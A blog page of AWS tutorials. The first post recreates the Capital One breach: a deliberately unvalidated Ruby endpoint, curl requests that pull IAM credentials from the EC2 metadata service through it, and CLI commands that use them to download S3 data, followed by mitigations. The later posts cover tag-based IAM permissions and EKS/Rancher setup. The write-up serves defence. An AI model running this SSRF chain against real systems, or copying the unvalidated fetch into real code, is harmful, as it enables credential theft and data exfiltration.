Thursday, August 15, 2019

How the Capital One hack was achieved in the AWS Cloud

DISCLOSURE: The intention of this blog is NOT to help others hack, but to help them secure applications built on top of AWS or any other cloud. A few mitigations for the SSRF vulnerability and related issues are mentioned towards the end of the blog.

Introduction

Capital One hosted their services on AWS and was hacked (1, 2, 3); data was downloaded from AWS S3. The hack, carried out by an ex-AWS employee, combined an AWS feature with a misconfiguration on Capital One's side. The information about the hack was everywhere in the news, but it was all in bits and pieces, and it took me some time to recreate the hack in my own AWS account. This blog walks through the sequence of steps to recreate the same hack in your own AWS account.

I came across the SSRF vulnerability only recently, but it looks like it has been around for ages, and still many organizations using the AWS Cloud haven't patched it. The hacker was able to get data from about 30 different organizations. I hope this documentation helps a few readers fix the hole in their applications and design/build more secure ones.

Here I am going with the assumption that readers are familiar with AWS concepts like EC2, Security Groups, WAF and IAM, and that they have an AWS account. The AWS Free Tier should be good enough to try out the steps.


Steps to recreate the Capital One hack

Step 1: Create a Security Group. Open port 80 for HTTP and port 22 for SSH, restricting the source to My IP.
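For those who prefer the AWS CLI over the console, a rough sketch of the same step is below (the group name is hypothetical, 1.2.3.4 stands for your public IP and the default VPC is assumed):

# Create the Security Group and open ports 22 and 80 only for your IP
aws ec2 create-security-group --group-name ssrf-demo-sg --description "SSRF demo security group"
aws ec2 authorize-security-group-ingress --group-name ssrf-demo-sg --protocol tcp --port 22 --cidr 1.2.3.4/32
aws ec2 authorize-security-group-ingress --group-name ssrf-demo-sg --protocol tcp --port 80 --cidr 1.2.3.4/32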

Step 2: Create an Ubuntu t2.micro EC2 instance with the above Security Group attached and log in to it via PuTTY.

Step 3: Create an IAM role (Role4EC2-S3RO) with the AmazonS3ReadOnlyAccess policy and attach the role to the above Ubuntu EC2 instance. Use a policy with very limited privileges, like S3 read-only access to a bucket with no critical data behind it.
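The same role can roughly be created from the AWS CLI as sketched below (ec2-trust.json is assumed to contain the standard trust policy allowing ec2.amazonaws.com to assume the role):

# Create the role, attach the managed read-only S3 policy and wrap it in an instance profile for EC2
aws iam create-role --role-name Role4EC2-S3RO --assume-role-policy-document file://ec2-trust.json
aws iam attach-role-policy --role-name Role4EC2-S3RO --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
aws iam create-instance-profile --instance-profile-name Role4EC2-S3RO
aws iam add-role-to-instance-profile --instance-profile-name Role4EC2-S3RO --role-name Role4EC2-S3RO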

Step 4: Run the below curl command on the Ubuntu EC2 instance to get the IAM role credentials via the EC2 metadata service.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 5: Install Ruby and Sinatra on the Ubuntu EC2 instance. The last command takes a few minutes to complete.

sudo apt-get update
sudo apt-get install ruby
sudo gem install sinatra

Step 6: Create a server.rb file with the below content on the Ubuntu EC2 instance. This is a tiny webserver: it takes a URL as input, opens it and returns the content of that URL to the browser. The input URL is never validated in the code below, so we can also point it at an internal-network URL, which is exactly how the hack worked.

require 'sinatra'
require 'open-uri'

get '/' do
  format 'RESPONSE: %s', open(params[:url]).read
end

Step 7: Get the private IP of the Ubuntu EC2 instance, substitute it for 1.2.3.4 in the below command and run it on the instance. This starts the webserver using the above Ruby program.

sudo ruby server.rb -o 1.2.3.4 -p 80

Step 8: Run the below command on the Ubuntu EC2 instance, replacing 5.6.7.8 with the public IP of the instance. server.rb will call google.com and return the response.

curl http://5.6.7.8:80/\?url\=https://www.google.com/

Now run the below command, again replacing 5.6.7.8 with the public IP of the instance. Notice that the security credentials of the role attached to the Ubuntu EC2 instance are returned in the response.

curl http://5.6.7.8:80/\?url\=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 9: Open the below URL in a browser on your own machine, replacing 5.6.7.8 with the public IP of the Ubuntu EC2 instance. The security credentials of the IAM role are displayed in the browser.

http://5.6.7.8:80?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

This is how Capital One and other organizations got hacked via the SSRF vulnerability. Once the hacker had the security credentials from the browser, it was just a matter of using the AWS CLI or an SDK to pull data from S3 or wherever else the policy attached to the IAM role allowed.
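As a rough sketch of that last step, the leaked temporary credentials can simply be exported as environment variables for the AWS CLI (all the values and the bucket name below are placeholders):

# Use the leaked temporary credentials of the IAM role
export AWS_ACCESS_KEY_ID=ASIAXXXXXXXXXXXXXXXX
export AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
export AWS_SESSION_TOKEN=xxxxxxxxxxxxxxxx
# List the buckets the role can see and download the contents of one of them
aws s3 ls
aws s3 sync s3://some-bucket-name .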

Websites often ask us to enter our LinkedIn or Twitter profile URL, fetch it and extract more information about us. If the input is not validated properly, the same feature can be exploited to invoke any other URL and pull details from behind the firewall. In the above command, a call is made to 169.254.169.254 (a link-local, internal-network IP) to get the credentials from the EC2 metadata service.

Step 10: Once done, make sure to terminate the EC2 instance and delete the role.
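A rough clean-up sketch using the AWS CLI (the instance ID is a placeholder; the instance profile with the same name exists if the role was attached via the console):

aws ec2 terminate-instances --instance-ids i-0123456789abcdef0
aws iam detach-role-policy --role-name Role4EC2-S3RO --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
aws iam remove-role-from-instance-profile --instance-profile-name Role4EC2-S3RO --role-name Role4EC2-S3RO
aws iam delete-instance-profile --instance-profile-name Role4EC2-S3RO
aws iam delete-role --role-name Role4EC2-S3RO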

Mitigations around the SSRF

Any one of the below steps would have stopped the Capital One hack or similar ones.

1. Review the application code for SSRF attack vectors and perform proper validation of the inputs, for example by allow-listing the hosts that can be fetched and rejecting link-local and private addresses.

2. Add a WAF rule that detects the string "169.254.169.254" and blocks the request before it reaches the EC2 instance, as shown in the diagram at the beginning of the blog.

3. On the Ubuntu EC2 instance itself, block calls to 169.254.169.254 from non-root processes using iptables.
iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP

4. Use services like Amazon Macie to detect anomalies in the data access patterns and take preventive action. There are also many third-party services which, when integrated with S3, will identify anomalies in the S3 access patterns and notify us. I haven't worked with such tools myself.

5. In the case of Capital One, it's not clear whether the EC2 instance really needed AmazonS3ReadOnlyAccess, but it's always better to grant any resource only the minimum privileges it requires.

Conclusion

AWS claims that their systems were secure and that the breach was down to Capital One's misconfiguration of the AWS WAF, along with a few other issues like giving excessive permissions to the EC2 instance via the IAM role. I agree with that, but AWS should also not have left the EC2 metadata service wide open to anyone with access to the EC2 instance. It's not clear how AWS would fix it, since any change to the EC2 metadata interface would break existing applications that use it. The letter from AWS to US Senator Wyden on this incident is an interesting read.

Whether we blame AWS or Capital One, in the end it's the customers of the roughly 30 affected organizations who suffer.

References

Retrieving the Role Security Credentials via EC2 Metadata

EC2s most dangerous feature

What is Sinatra?

What is SSRF and code for the same

On Capital One from Krebs (1, 2)

On Capital One From Evan (1)

Technical analysis of the hack by CloudSploit

WAF FAQ

Monday, July 1, 2019

How to use Tags in AWS to grant resource permissions

Within AWS we can create multiple resources like EC2, S3, RDS, Lambda etc. After creating the resources, permissions should be granted appropriately. Let's say we have two servers for Production and two for Development; then the users in the Production group should have access to the Production servers and the users in the Development group should have access to the Development servers, and not the other way around. The permissions can be to view, stop, start, terminate, reboot etc.
 

The same can be achieved using the AWS "Identity and Access Management" (IAM) service along with Tags, as shown in the above diagram. Tags are metadata attached to AWS resources like EC2; each tag has a key and a value. For example, the key can be Env and the value Production. We can tag EC2 instances with Env=Production and grant the Production group permissions only on the EC2 instances that carry the tag Env=Production, skipping the rest.

Here are the steps for the above at a high level.

1) Create an IAM User with no policies attached
2) Create a Policy with the appropriate permissions
3) Create a Group and attach the above Policy to it
4) Add the User to the Group
5) Create two EC2s with the appropriate tags
6) Login as the IAM User and check the actions allowed on the EC2

 

Sequence of steps for setting up access to EC2

Step 1: Create an IAM User

Step 1.1: Go to the IAM Management Console, click on the Users tab in the left pane and click on "Add User".


Step 1.2: Enter the user name and make sure to select "AWS Management Console Access". Click on "Next: Permissions".


Step 1.3: We will add the permissions later; for now click on "Next: Tags".


Step 1.4: Tags are optional for a user. So, click on "Next: Review".


Step 1.5: Make sure the user details are proper and click on "Create user". The IAM User will be created as shown in the below screen.



Step 2: Create a policy with the appropriate permissions

Step 2.1: Click on the policies in the left pane and click on "Create policy".


Step 2.2: Click on the JSON tab, enter the below policy and click on "Review policy". The below JSON grants permission to stop/start EC2 instances that have the tag Env=Production, while allowing the description of all EC2 instances to be viewed. The policy was taken from here and modified; here are a lot more sample policies from AWS.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "ec2:StartInstances",
                "ec2:StopInstances"
            ],
            "Resource": "arn:aws:ec2:*:*:instance/*",
            "Condition": {
                "StringEquals": {
                    "ec2:ResourceTag/Env": "Production"
                }
            }
        },
        {
            "Effect": "Allow",
            "Action": "ec2:DescribeInstances",
            "Resource": "*"
        }
    ]
}

Step 2.3: Give the policy a name and click on "Create policy". The policy should be created as shown below.
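If you prefer the CLI, the same policy can be created roughly as below, assuming the JSON above has been saved to a local file (the policy and file names are just examples):

# Create the IAM policy from the JSON document saved locally
aws iam create-policy --policy-name StartStopProductionEC2 --policy-document file://ec2-prod-policy.json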



Step 3: Create a Group and attach the policy to it

Step 3.1: Click on the Group tab in the left pane and click on "Create New Group".


Step 3.2: Enter the Group Name and click on "Next Step".


Step 3.3: Select the Policy which has been created earlier and click on "Next Step".


Step 3.4: Review the Group details and click on "Create Group".


Step 4: Add the user to the Group

Step 4.1: Select the Group which was created earlier, click on "Group Actions" and then "Add Users to Group", select the user created earlier and click on "Add Users".



Step 5: Create EC2 instances and tag them

Step 5.1: Create two EC2 instances as mentioned here. A smaller instance type is recommended as it costs less and we won't be doing any processing on these instances. Click on the Tags tab and then on "Add/Edit Tags".


Step 5.2: Enter the Tags as shown below and click on "Create Tag". For the other instance specify the Key as Env and Value as Production.


The tags on the EC2 instances should appear as below. The Env column is not shown by default; click on the gear button on the top right and select Env to make the column visible.
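The tags can also be applied from the AWS CLI, roughly as below (the instance IDs are placeholders):

# Tag one instance as Production and the other as Development
aws ec2 create-tags --resources i-0aaaabbbbcccc1111 --tags Key=Env,Value=Production
aws ec2 create-tags --resources i-0dddd2222eeee3333 --tags Key=Env,Value=Development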


Step 6: Login as the IAM User and check the actions allowed

Step 6.1: Go to the Dashboard in the IAM Management Console and grab the sign-in URL. Open the URL in an entirely different browser and enter the credentials of the IAM user.



Step 6.2: Go to the EC2 Management Console. Notice the name of the logged-in user at the top right, as highlighted below: it's the IAM user.


Step 6.3: Select the Development EC2 instance and try to terminate it as shown below. It should fail with an error, because the IAM user only has stop/start access to EC2 instances that carry the tag Env=Production and nothing else.



Step 6.4: Select the Production instance and try to stop it. This time it works, as the user has access to stop/start any EC2 instance with the tag Env=Production.
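The same checks can be done from the AWS CLI, assuming access keys have also been created for this IAM user (the instance IDs are placeholders):

# Allowed: the instance carries the tag Env=Production and the policy permits Stop/Start
aws ec2 stop-instances --instance-ids i-0aaaabbbbcccc1111
# Denied: Terminate is not in the policy, so this fails with an UnauthorizedOperation error
aws ec2 terminate-instances --instance-ids i-0dddd2222eeee3333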


 

Conclusion


Tags are metadata around AWS resources like EC2, S3, RDS etc. We have seen above how tagging can be used to group EC2 resources together and give permissions to IAM users; the same applies to other AWS resources as well. Tagging can also be used to segregate AWS billing, let's say across different departments, customers, projects etc. The usage of tagging is limited only by imagination; the different scenarios and strategies are covered in this AWS article.

Wednesday, April 10, 2019

Setting up an AWS EKS Cluster with Rancher

In the previous blog we explored setting up a K8S cluster on the AWS Cloud without using any additional software or tools. The cloud providers make it easy to create a K8S cluster in the cloud; the tough part is securing it, fine-tuning, upgrading, access management etc. Rancher provides centralized management of different K8S clusters, which can be in any of the clouds (AWS, GCP, Azure) or on-premises. More on what Rancher has to offer on top of K8S here. The good thing about Rancher is that it's 100% open source and there is no vendor lock-in; we can simply remove Rancher and interact with the K8S cluster directly.

Rancher also allows creating K8S clusters in different environments. In this blog we will look at installing a K8S cluster on the AWS Cloud in a quick-and-dirty way (not ready for production). Here are the instructions for the same. The only prerequisite is access to a Linux machine with Docker installed on it.

Steps for creating a K8S Cluster on AWS using Rancher


Step 1: Log in to the Linux console and run the Rancher container using the below command.

sudo docker run -d --restart=unless-stopped -p 80:80 -p 443:443 rancher/rancher


Step 2: Access the Rancher Console in a browser. Click on "Advanced" and then "Accept the Risk and Continue".



Step 3: Set up an admin password to access the Rancher Console.


Step 4: Click on "Save URL".


Step 5: Click on "Add Cluster" and select "Amazon EKS".



Step 6: Select the Region and provide the AWS Access Key and Secret Key. These can be generated as mentioned in the "Generate access keys for programmatic access" section here. Click on "Next: Configure Cluster".


Step 7: Click on "Next: Select VPC & Subnet"


Step 8: Click on "Next: Select Instance Options"


Step 9: There is a small catch here. In this screen we specify the minimum and maximum number of nodes in the ASG (Auto Scaling Group), but nowhere do we specify the default size to start with. So, when the cluster is started, it creates 3 EC2 instances by default. There is an issue in the Rancher GitHub project for this and it's still open.

Click on Create.


Step 10: Initially the Cluster will be in a Provisioning State and after 10-15 minutes it will change to Active State.



During the Cluster creation process, the following will be created. The same can be observed by going to the AWS Management Console for the appropriate Service.

          1) CloudFormation Stacks
          2) EC2 instances
          3) VPC
          4) EKS Control Plane

Step 11: Go through the different screens in the Rancher Console.



Step 12: Once you have spent some time with the Rancher Console, select the AWS cluster created in the above sequence of steps and delete it. After a few minutes the cluster should be gone from the Rancher Console.



Step 13: Although the Rancher Console says that the cluster has been deleted, there might be some resources left hanging in AWS as shown below; not sure where the bug is. Any AWS resources that are not deleted might add to the monthly bill, so it's always better to go to the AWS Management Console for CloudFormation, EC2, S3, VPC and EKS and make sure all the resources are gone.
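A few AWS CLI commands that can help spot the leftovers, assuming the CLI is configured for the same region the cluster was created in:

# Look for CloudFormation stacks, EKS clusters and EC2 instances that should have been removed
aws cloudformation list-stacks --stack-status-filter CREATE_COMPLETE
aws eks list-clusters
aws ec2 describe-instances --filters Name=instance-state-name,Values=running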


Conclusion


An AWS EKS cluster can be easily created using Rancher as shown above, and the steps are more or less the same for creating a cluster on Azure and GCP. Rancher also allows importing an existing K8S cluster. Once all the clusters are within Rancher they can be managed centrally, policies can be applied etc., which makes life easier when there are multiple K8S clusters to manage within an organization.

As seen above, there are a few rough edges in the installation process. First, there is no way to specify the default number of EC2 worker nodes in the cluster. Also, not all the AWS resources are deleted when the EKS cluster is deleted through Rancher, which might incur additional cost. These things might be fixed in future releases of Rancher.

Also, note that this is a quick-and-dirty way of installing a K8S cluster on AWS using Rancher and is not ready for production, as this particular setup doesn't support high availability. Here are the instructions on how to set up an HA cluster using Rancher.

Wednesday, April 3, 2019

K8S Cluster on AWS using EKS

As mentioned in the previous blogs, there are different ways of getting started with K8S (Minikube, Play with K8S, K3S, Kubeadm, Kops etc.), listed here in the K8S documentation. Some of them involve running K8S on the local machine and some in the cloud. AWS EKS, Google GKE and Azure AKS are a few of the managed K8S services in the cloud.

By following the instructions mentioned here, it takes about 20 minutes to set up and access the K8S cluster. Below is what gets created at the end of following those instructions.

1) As usual, AWS uses CloudFormation for automating tasks around the cluster setup. There are two Stacks: one creating a new VPC where the K8S cluster will be running, and the other creating the worker nodes which we have to manage.


2) A new VPC with the subnets, route tables, internet gateways, security groups etc., automatically created by the CloudFormation template.


3) An EKS cluster which manages the components in the control plane (the K8S master) and makes sure they are highly available.


4) EC2 instances for the K8S workers, again created by CloudFormation. By default 4 EC2 instances are created, but this can be reduced to 1 as we won't be running a heavy load on the cluster; just change the default number of instances for the Auto Scaling group from 4 to 1 in the CloudFormation template. I changed it to 2, hence the number of EC2 instances shown.


5) Service roles created manually and by the CloudFormation Stack.


6) Once the Guestbook application has been deployed on the AWS K8S Cluster, the same can be accessed as shown below.


7) We can get the nodes, pods and namespaces as shown below. Note that an alias has been set up for the kubectl command.
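For reference, the alias and the queries are along these lines ('k' is simply the alias name used here):

# Shorten kubectl to k and query the cluster
alias k=kubectl
k get nodes
k get pods --all-namespaces
k get namespaces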

 

A few things to keep in mind


1) As mentioned above, the default number of worker nodes can be decreased to 1 while creating the Stack for the K8S workers. It saves $$$.

2) There were a few errors while creating the VPC via the CloudFormation Stack, as shown below. This error happens in a region where the default VPC was deleted and created again; otherwise it works fine. Even after a bit of debugging, the cause of the error was not obvious.


A quick workaround for the above problem, in case someone gets stuck on it, is to use another region which still has the default VPC created by AWS, or to hard-code the Availability Zones in the CloudFormation template as shown below.


3) Don't forget to delete the Guestbook application (1) and the AWS EKS Cluster (1).

Conclusion


Just to conclude, it takes around 20 minutes to set up a cluster. Instead of repeating the steps in this blog, here again are the steps from the AWS documentation to get started with a K8S cluster on AWS.

For the sake of learning and trying out different things, I would prefer to set up the K8S cluster on the local machine, as it is faster to start the cluster and quickly try out a few things. Also, the cloud vendors are a bit behind on the K8S version: as of this writing, AWS EKS supports K8S version 1.12 and lower, which is about 6 months old, while the latest K8S version is 1.14, released recently.